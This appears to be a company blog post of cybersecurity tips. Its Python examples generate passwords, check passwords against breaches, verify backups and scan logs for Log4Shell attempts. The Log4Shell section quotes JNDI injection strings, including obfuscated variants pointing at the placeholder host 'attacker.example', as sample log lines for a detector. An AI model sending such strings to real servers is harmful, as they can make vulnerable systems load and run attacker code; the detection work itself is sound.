5 cybersecurity tips to start 2022
What are your new year's resolutions for 2022? We decided to give you a little help by drawing up a list of 5 cybersecurity best practices. Put them in place to reduce your risk of data theft or loss. Cybersecurity is an increasingly complex issue for organizations: after a cyber attack, an organization can be paralyzed for months, with all the consequences that implies: business disruption, financial losses, legal fees, damage to reputation, and more. Cybersecurity is not only a technical subject; it depends on everyone's involvement. After reading these few lines, you will no longer be easy prey for attackers.
1) Use a long and complex password, the best safeguard in cybersecurity
Create strong passwords: long first of all (a dozen characters or more), and containing upper and lower case letters, numbers and symbols. Think of a password that has no connection to you (no names, dates or hobbies). This way it will be slow to find with automated tools and very hard for a third party to guess.
We strongly advise you to change a password as soon as there is any sign it may have leaked, because the platforms you use are not infallible (a unique, strong password changed promptly after a breach protects you better than changing all of them on a fixed schedule). If you use an iPhone and store your passwords in iCloud Keychain, you have probably already seen the warning that one of your passwords has appeared in a data leak. This feature, introduced with iOS 14, compares your saved passwords against known breach data and tells you when one has been exposed. If you don't use iCloud Keychain or are on Android, don't worry: go to haveibeenpwned.com and enter the email address you usually use for your accounts to find out whether it appears in a known breach and what information was leaked.
Choose a different password for each site. It is essential that your passwords are not related to each other, especially when you change them. It can be tempting to reuse the beginning of a password or to follow a pattern so you can remember it; that is exactly the kind of construction to avoid, because once one password leaks, the others can be derived from it. If you recognize yourself in this practice, change your passwords.
All this seems clear, but most of us have dozens of online accounts, which makes memorizing them all impractical. Instead of writing your passwords in a notebook, use software dedicated to this purpose, such as KeePass, a password manager published under a free license that stores your passwords in an encrypted database. The database file is unlocked with a master password, optionally combined with other factors such as a key file.
Finally, your banker has probably already warned you never to give your card PIN to anyone. The same goes for your passwords. The cybersecurity error that leads to an attack will not necessarily come from you; it may come from another person who is less vigilant. You should therefore not share your password, not for lack of trust, but because the person you share it with may not have read this article or may not yet follow good security practices. If you really must share a password with someone, change it afterwards.
We can never be too careful when it comes to cybersecurity, so we strongly recommend enabling two-factor authentication wherever it is offered. More and more tools and applications support a second factor that uses another device, such as your phone, to protect your account: PayPal, for example, can send you a security code by SMS. This adds an extra step to logging in, and it means a stolen password alone is no longer enough. Where you have the choice, prefer an authenticator app or a hardware security key over SMS codes, which can be intercepted or diverted through SIM swapping.
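To make the password advice above concrete, here is an added example (written for this article, not code from the original page or from any of the products it mentions) in Python. It generates a random password that satisfies the character-class rule, and it shows how a breach check of the kind haveibeenpwned.com offers can be done without sending the password anywhere: only the first 5 hex characters of the password's SHA-1 hash are sent to the Pwned Passwords range API, and the matching is done locally on the returned "SUFFIX:COUNT" lines. The range response embedded below is constructed for the example (the count is made up; the suffix is the real SHA-1 suffix of the word "password"), and the fetch function is an offline stand-in for the HTTP request.

```python
import hashlib
import secrets
import string

# Constructed stand-in for the text the range API returns for the SHA-1 prefix
# "5BAA6": one "SUFFIX:COUNT" line per leaked hash in that range. The second
# line is the suffix of SHA-1("password"); the counts are invented for this example.
SAMPLE_RANGE_RESPONSE = "\n".join([
    "0018A45C4D1DEF81644B54AB7F969B88D65:1",
    "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493",
    "2A8D9F8E6B4B8E3F9A5B1C2D3E4F5A6B7C8:12",
])


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_for_range_query(password: str):
    """Return (prefix, suffix): only the 5-char prefix ever leaves the machine."""
    digest = sha1_hex(password)
    return digest[:5], digest[5:]


def parse_range_response(text: str) -> dict:
    """Map each hash suffix in a range response to its breach count."""
    counts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def breach_count(password: str, fetch_range) -> int:
    """fetch_range(prefix) must return the range response text for that prefix.
    Returns how many times the password appeared in known breaches (0 = not found)."""
    prefix, suffix = split_for_range_query(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


def offline_fetch(prefix: str) -> str:
    # Stand-in for an HTTP GET of https://api.pwnedpasswords.com/range/<prefix>
    # (assumption for this example: only the "5BAA6" range has sample data).
    return SAMPLE_RANGE_RESPONSE if prefix == "5BAA6" else ""


def generate_password(length: int = 20) -> str:
    """Random password from the OS CSPRNG, guaranteed to contain all four classes."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    while True:
        pw = "".join(secrets.choice(alphabet) for _ in range(length))
        if (any(c.islower() for c in pw) and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw)
                and any(c in string.punctuation for c in pw)):
            return pw


if __name__ == "__main__":
    print("'password' seen in breaches:", breach_count("password", offline_fetch))
    fresh = generate_password()
    print("generated:", fresh, "seen in breaches:", breach_count(fresh, offline_fetch))
```

To run it against the live service, replace offline_fetch with a function that performs the GET request and returns the response body; the rest of the logic is unchanged, and the password itself is still never transmitted.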
2) Beware of phishing, a dreaded cyber attack
Phishing is a common entry point for a cyber attack. Keep in mind that your bank will never ask you for your login details by email, and the postal service will never email you from an address like "firstname.lastname@example.org" asking you to pay to release a parcel. These are clues that help you spot phishing, but it is sometimes harder to identify: it also happens that a phishing page is hosted on the website of a well-known company after that site has been hacked, so a familiar domain is not a guarantee. Never fill out a form on such fake pages; this technique is especially common against online banking customers. If you have any doubt about a link or a file, whether on social networks, by email or on the web, do not click on it. Contact the sender through a channel you already trust (not the contact details given in the message) to verify its legitimacy, or contact your IT department if you are in a company.
Phishing is among the most effective and widespread ways of delivering malicious code, so it is important to train your employees regularly on cybersecurity issues and current practices: an employee can put the organization at risk through lack of knowledge or by simple mistake, and as described in the introduction, a cyber attack can have serious consequences. Since the acceleration of digitalization caused by Covid-19, the number of cyber attacks has risen. It is therefore necessary to put in place security protocols and governance to limit the damage when phishing succeeds.
If you are an IT security manager, we advise you to set up a catalog of roles and access profiles in order to avoid the accumulation of unnecessary access rights; in case of accidental changes or an intrusion, excessive rights have a heavy impact. Assign only the permissions users need to reach the resources their job requires (the principle of least privilege). For example, do not use an administrator account for everyday work or web browsing: a standard user account is usually sufficient and limits the damage if it is compromised.
3) Make regular backups to ensure business continuity
“You must be resilient.” This is a term we often hear in these times of crisis, and it takes on its full meaning during a cyber attack. Resilience is the ability to overcome a shock. According to IBM's 2021 Cost of a Data Breach report, organizations take an average of 287 days to identify and contain a breach. Continuity management is therefore crucial. We invite you to learn more about the ISO 22301 standard, which deals with business continuity management systems. Furthermore, if you are looking to implement a governance solution, we have a cockpit dedicated to this topic.
In this article, we will only talk about backups, one of the best shields in cybersecurity: they let you react quickly when a cyber attack or a major malfunction occurs, and they protect both your data and your business. With a backup, you can always recover your data in case of loss or theft. Set up complete and recurring backups, but keep them decoupled from your main information system: a backup drive that stays connected is encrypted by ransomware together with everything else. Prefer a cloud service, an external drive or a USB key that is disconnected after the copy, keep more than one copy, and above all test restoring from your backups regularly; a backup that has never been restored is only a hope.
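The last point, testing the restore, is the step most often skipped, so here is an added example (written for this article, not code from the original page or from any product it mentions) in Python. It archives a directory, records a SHA-256 checksum of the archive and of every file in a manifest, and then verifies the backup the only way that counts: by restoring it into a scratch directory and comparing every restored file against the manifest. The demo function builds a small constructed source tree, verifies a clean backup, then corrupts the archive and shows the check catching it. The directory layout and file names are assumptions made for the example.

```python
import hashlib
import json
import tarfile
import tempfile
import time
from pathlib import Path


def sha256_file(path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def create_backup(src_dir, dest_dir):
    """Archive src_dir into dest_dir (ideally an external or offline location)
    and write a manifest with the archive checksum and a SHA-256 per file.
    Returns (archive_path, manifest_path)."""
    src, dest = Path(src_dir), Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    archive = dest / f"{src.name}-{time.strftime('%Y%m%d-%H%M%S')}.tar.gz"
    files = {}
    with tarfile.open(archive, "w:gz") as tar:
        for p in sorted(src.rglob("*")):
            if p.is_file():
                rel = p.relative_to(src).as_posix()
                files[rel] = sha256_file(p)
                tar.add(str(p), arcname=rel)
    manifest_path = archive.with_name(archive.name + ".manifest.json")
    manifest = {"archive_sha256": sha256_file(archive), "files": files}
    manifest_path.write_text(json.dumps(manifest, indent=2))
    return archive, manifest_path


def verify_restore(archive, manifest_path):
    """Restore the archive into a scratch directory and check every file against
    the manifest. Returns a list of problems; an empty list means it restores cleanly."""
    archive, manifest_path = Path(archive), Path(manifest_path)
    manifest = json.loads(manifest_path.read_text())
    problems = []
    if sha256_file(archive) != manifest["archive_sha256"]:
        problems.append("archive checksum mismatch (corrupted or tampered)")
        return problems
    with tempfile.TemporaryDirectory() as tmp:
        with tarfile.open(archive, "r:gz") as tar:
            try:
                tar.extractall(tmp, filter="data")  # rejects absolute paths and '..' members
            except TypeError:                       # older Python without the filter argument
                tar.extractall(tmp)
        restored = {p.relative_to(tmp).as_posix(): sha256_file(p)
                    for p in Path(tmp).rglob("*") if p.is_file()}
    for rel, digest in manifest["files"].items():
        if rel not in restored:
            problems.append(f"missing after restore: {rel}")
        elif restored[rel] != digest:
            problems.append(f"content changed: {rel}")
    for rel in restored:
        if rel not in manifest["files"]:
            problems.append(f"unexpected file: {rel}")
    return problems


def demo_roundtrip():
    """Back up a constructed sample tree, verify it, corrupt the archive, verify again.
    Returns (problems_for_clean_backup, problems_for_corrupted_backup)."""
    with tempfile.TemporaryDirectory() as work:
        src = Path(work) / "docs"          # constructed sample data, not real files
        (src / "sub").mkdir(parents=True)
        (src / "notes.txt").write_text("constructed sample file\n")
        (src / "sub" / "data.bin").write_bytes(bytes(range(256)))
        archive, manifest = create_backup(src, Path(work) / "backups")
        clean = verify_restore(archive, manifest)
        with open(archive, "ab") as f:
            f.write(b"\0")                 # simulate corruption in storage or transit
        corrupted = verify_restore(archive, manifest)
    return clean, corrupted


if __name__ == "__main__":
    clean, corrupted = demo_roundtrip()
    print("clean backup problems:", clean)
    print("corrupted backup problems:", corrupted)
```

Store the manifest with the archive but also keep a copy elsewhere: if an attacker can rewrite both the archive and its manifest on the same medium, the checksum no longer proves anything, which is one more reason the backup medium must be disconnected from the production system.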
4) Install updates, an essential cybersecurity safeguard
A few weeks ago, you probably heard about the Log4Shell flaw (CVE-2021-44228). It concerns Log4j, a Java logging library developed by the Apache Software Foundation and used by countless applications to record information such as error reports. Researchers found that if an attacker can get a specially crafted string such as "${jndi:ldap://attacker-controlled-server/...}" into a log message (for example through an HTTP header or a form field), the library's lookup feature contacts that server and can load and execute Java code it returns, giving the attacker control of the server. According to Apache, the vulnerability affects Log4j versions 2.0-beta9 through 2.14.1. The fix first shipped in 2.15.0, and later releases corrected further issues found in that initial patch, so move to the current release rather than stopping at 2.15.0.
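Two checks a practitioner wants right after reading this, as an added example written for this article (not code from the original page or from the Apache project) in Python: a scan of web-server log lines for the JNDI lookup string, including the nested "${lower:j}" and "${env:NOPE:-j}" forms attackers used to hide the word "jndi" from naive pattern matches, and a version check that encodes Apache's affected range 2.0-beta9 through 2.14.1 while excluding the fixed backports 2.3.1 (Java 6) and 2.12.2 (Java 7). The log lines are constructed for the example and are not from a real incident; "attacker.example" is a placeholder host.

```python
import re

# Constructed web-server log lines (not from a real incident). Lines 1-4 carry the
# kind of crafted string an attacker puts in a header or parameter, hoping a
# vulnerable Log4j 2 instance will log it and resolve the JNDI lookup.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:rmi://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:dns://attacker.example/a}"',
    '10.0.0.7 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")      # a ${...} with nothing nested inside
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_lookup(body: str):
    """Emulate the Log4j 2 lookups attackers nest to disguise 'jndi'.
    Returns the substituted text, or None for lookups we deliberately leave alone."""
    name, _, arg = body.partition(":")
    name = name.lower()
    if name == "jndi":
        return None                       # the thing we are hunting: never rewrite it
    if ":-" in body:                      # ${env:NOPE:-j}: lookup fails, default 'j' is used
        return body.split(":-", 1)[1]
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return None                           # date, sys, ...: irrelevant here, keep as-is


def normalize(line: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            out = resolve_lookup(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        line = INNERMOST_LOOKUP.sub(repl, line)
        if not changed:
            break
    return line


def is_jndi_probe(line: str) -> bool:
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Indexes of lines carrying a (possibly obfuscated) JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]


def is_affected_version(version: str) -> bool:
    """True for Log4j 2.0-beta9 through 2.14.1 (CVE-2021-44228, per Apache), excluding
    the fixed backports 2.3.1 (Java 6) and 2.12.2 (Java 7) and their later patch levels."""
    m = re.fullmatch(r"2\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?", version.strip())
    if not m:
        return False                      # 1.x or unparseable: not covered by this check
    minor, patch = int(m.group(1)), int(m.group(2) or 0)
    pre, pre_n = m.group(3), m.group(4)
    if minor == 0 and pre == "beta":
        return int(pre_n) >= 9
    if minor == 3:
        return patch < 1
    if minor == 12:
        return patch < 2
    return minor <= 14


if __name__ == "__main__":
    for i in scan(SAMPLE_LOGS):
        print(f"line {i}: {SAMPLE_LOGS[i]}  ->  {normalize(SAMPLE_LOGS[i])}")
    for v in ("2.14.1", "2.15.0", "2.12.2", "2.0-beta8"):
        print(v, "affected" if is_affected_version(v) else "not affected")
```

The scan only recognizes the obfuscations it emulates (lower, upper and the default-value syntax); treat any unexpected "${" in untrusted input as worth a look, and remember that a hit in your logs shows someone tried, not that the attempt succeeded. The version check is only as good as your inventory: Log4j is frequently bundled inside other applications' jar files, so search those too.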
Therefore, keep your servers, browsers, operating systems and applications up to date. Updates add features and improvements, but above all they fix security vulnerabilities. Attackers actively scan for machines running unpatched software in order to exploit them, so enable automatic updates on your systems and applications wherever possible, and keep an inventory of what you run so you can tell quickly whether a newly announced flaw concerns you.
5) Install a VPN and an antivirus software to strengthen your protection
Your operating system usually offers a first layer of protection, such as Microsoft Defender on Windows or XProtect and Gatekeeper on macOS. If your device contains sensitive data and you want to strengthen its security, you can install a dedicated antivirus product. Other tools such as AdwCleaner can remove adware and spyware, but a full antivirus product remains the more complete solution: it detects, blocks and removes malware. Combined with a firewall, which controls which network connections are allowed into and out of your computer, it offers good protection; for that reason it is important to configure your firewall properly and to keep both up to date.
Finally, with the BYOD (Bring Your Own Device) trend and the rise of home office, it becomes essential for a company to use a VPN (Virtual Private Network). A VPN creates an encrypted tunnel over public networks: wherever your employees are, their traffic to the company's resources travels as if they were on the office network, and an attacker on an untrusted Wi-Fi network cannot read or tamper with it. This protects your colleagues who are likely to work remotely on networks that may be insecure.
As a bonus, we advise you to check your information security management system (ISMS) by having it audited regularly and by implementing a cyber governance solution such as smartcockpit. Whether you are an SME or a larger organization, it will help you identify, protect, detect, respond to threats and recover quickly from a cyber attack thanks to business continuity plans. You can download our white paper summarizing the principles of cyber governance.